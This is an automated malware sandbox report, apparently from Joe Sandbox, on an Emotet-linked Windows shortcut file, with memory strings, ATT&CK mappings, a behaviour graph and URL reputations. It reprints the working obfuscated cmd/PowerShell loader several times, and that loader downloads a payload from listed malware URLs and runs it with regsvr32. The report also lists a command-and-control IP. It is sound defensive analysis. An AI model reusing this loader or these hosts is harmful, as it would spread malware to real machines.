                    Source: svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAWal\BFE_Notify_Event_{93123fe3-9214-4982-a268-8579736b9414}LMEM
                    Source: svchost.exe, 00000008.00000002.702469938.0000011182229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
                    Source: svchost.exe, 00000014.00000002.696448281.0000024B5D28A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: powershell.exe, 00000002.00000002.478043422.0000021B76760000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.703075348.0000011187C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696523576.0000024B5D2EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696514331.0000024B5D2E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000A.00000002.702339355.000002592EE02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                    Source: regsvr32.exe, 00000004.00000002.702333697.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540406266.0000000000A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000A.00000002.702379928.000002592EE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CB0215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CB0CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CABE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP

                    Language, Device and Operating System Detection

                    barindex
                    Source: Yara matchFile source: Details.lnk, type: SAMPLE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CA8860 HeapCreate,GetVersion,HeapSetInformation,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 4.2.regsvr32.exe.2330000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium12
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts21
                    Command and Scripting Interpreter
                    Boot or Logon Initialization Scripts111
                    Process Injection
                    2
                    Obfuscated Files or Information
                    LSASS Memory2
                    File and Directory Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    PowerShell
                    Logon Script (Windows)Logon Script (Windows)1
                    DLL Side-Loading
                    Security Account Manager25
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                    Masquerading
                    NTDS1
                    Query Registry
                    Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                    Virtualization/Sandbox Evasion
                    LSA Secrets131
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size Limits22
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common111
                    Process Injection
                    Cached Domain Credentials31
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Hidden Files and Directories
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Regsvr32
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    Remote System Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 632105 Sample: Details.lnk Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Windows shortcut file (LNK) starts blacklisted processes 2->51 53 8 other signatures 2->53 8 cmd.exe 1 2->8         started        11 svchost.exe 9 1 2->11         started        14 svchost.exe 2->14         started        16 4 other processes 2->16 process3 dnsIp4 57 Windows shortcut file (LNK) starts blacklisted processes 8->57 59 Suspicious powershell command line found 8->59 18 powershell.exe 14 21 8->18         started        23 conhost.exe 1 8->23         started        43 127.0.0.1 unknown unknown 11->43 signatures5 process6 dnsIp7 37 www.jsonsintl.com 18->37 39 jsonsintl.com 98.142.105.106, 49763, 80 DIMENOCUS United States 18->39 33 C:\Users\user\AppData\...\IKdzfJtQpj.BCP, PE32+ 18->33 dropped 55 Powershell drops PE file 18->55 25 regsvr32.exe 5 18->25         started        41 192.168.2.1 unknown unknown 23->41 file8 signatures9 process10 file11 35 C:\Windows\System32\...\fJMgQrGs.dll (copy), PE32+ 25->35 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->61 29 regsvr32.exe 25->29         started        signatures12 process13 dnsIp14 45 173.82.82.196, 49788, 8080 MULTA-ASN1US United States 29->45 63 System process connects to network (likely due to code injection or exploit) 29->63 signatures15

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Details.lnk41%ReversingLabsShortcut.Trojan.BynocoLNK
                    Details.lnk100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP31%MetadefenderBrowse
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP40%ReversingLabsWin64.Trojan.Emotet
                    C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)31%MetadefenderBrowse
                    C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)40%ReversingLabsWin64.Trojan.Emotet
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                    http://schemas.mic0%URL Reputationsafe
                    http://www.jsonsintl.com/0%Avira URL Cloudsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.microsoft.co0%URL Reputationsafe
                    http://digitalkitchen.jp/images/PVn/100%Avira URL Cloudmalware
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/100%Avira URL Cloudmalware
                    http://crl.ver)0%Avira URL Cloudsafe
                    https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                    http://piffl.com/piffl.com/a/ity.100%Avira URL Cloudmalware
                    http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/100%Avira URL Cloudmalware
                    http://jsonsintl.com0%Avira URL Cloudsafe
                    https://173.82.82.196:8080/100%URL Reputationmalware
                    https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                    http://piffl.com/piffl.com/a/100%Avira URL Cloudmalware
                    https://173.82.82.196/6100%Avira URL Cloudmalware
                    https://nakharinitwebhosting.com/HSDYKN1X5GLF/100%Avira URL Cloudmalware
                    https://173.82.82.196/~100%Avira URL Cloudmalware
                    http://www.jsonsintl.com0%Avira URL Cloudsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://www.pango.co/privacy0%URL Reputationsafe
                    https://disneyplus.com/legal.0%URL Reputationsafe
                    http://help.disneyplus.com.0%URL Reputationsafe
                    http://www.jsonsintl.comx0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    jsonsintl.com
                    98.142.105.106
                    truefalse
                      unknown
                      www.jsonsintl.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enusvchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://schemas.micsvchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jsonsintl.com/powershell.exe, 00000002.00000002.474736175.0000021B5F008000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://go.microsoft.copowershell.exe, 00000002.00000002.477597514.0000021B76452000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://digitalkitchen.jp/images/PVn/powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://go.micropowershell.exe, 00000002.00000002.476380222.0000021B5F586000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.ver)svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696586993.0000024B5DD00000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.671989281.0000024B5DD91000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://piffl.com/piffl.com/a/ity.powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://jsonsintl.compowershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://support.hotspotshield.com/svchost.exe, 00000014.00000003.664116603.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664184399.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664236560.0000024B5DD8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664137632.0000024B5DD9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664221301.0000024B5E202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664163835.0000024B5E21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664099803.0000024B5DDB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.664152802.0000024B5DDBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://173.82.82.196:8080/regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://piffl.com/piffl.com/a/powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
